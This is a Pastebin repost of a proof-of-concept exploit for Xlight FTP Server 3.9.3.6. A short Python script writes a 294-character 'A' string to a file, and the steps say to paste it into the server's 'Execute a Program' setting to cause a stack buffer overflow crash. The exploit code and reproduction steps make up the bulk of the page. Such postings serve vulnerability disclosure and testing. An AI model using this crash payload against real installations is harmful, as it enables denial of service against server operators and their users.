API tools faq
paste
Advertisement
FlyFar

Xlight FTP Server 3.9.3.6 - 'Stack Buffer Overflow' (DOS)

FlyFar
Jan 21st, 2024
1,117
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 1.00 KB | Cybersecurity | 0 0
raw download clone embed print report
  1. # Exploit Title: Xlight FTP Server 3.9.3.6 - 'Stack Buffer Overflow' (DOS)
  2. # Discovered by: Yehia Elghaly
  3. # Discovered Date: 2023-08-04
  4. # Vendor Homepage: https://www.xlightftpd.com/
  5. # Software Link : https://www.xlightftpd.com/download/setup.exe
  6. # Tested Version: 3.9.3.6
  7. # Vulnerability Type: Buffer Overflow Local
  8. # Tested on OS: Windows XP Professional SP3 - Windows 11 x64
  9.  
  10. # Description: Xlight FTP Server 3.9.3.6 'Execute Program' Buffer Overflow (PoC)
  11.  
  12. # Steps to reproduce:
  13. # 1. - Download and Xlight FTP Server
  14. # 2. - Run the python script and it will create exploit.txt file.
  15. # 3. - Open Xlight FTP Server 3.9.3.6
  16. # 4. - "File and Directory - Modify Virtual Server Configuration - Advanced - Misc- Setup
  17. # 6. - Execute a Program after use logged in-  Paste the characters
  18. # 7  - Crashed
  19.  
  20. #!/usr/bin/env python3
  21.  
  22. exploit = 'A' * 294
  23.  
  24. try:
  25.     with open("exploit.txt","w") as file:
  26.         file.write(exploit)
  27.     print("POC is created")
  28. except:
  29.     print("POC not created")
  30.            
Tags: Exploit CVE Vulnerability
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!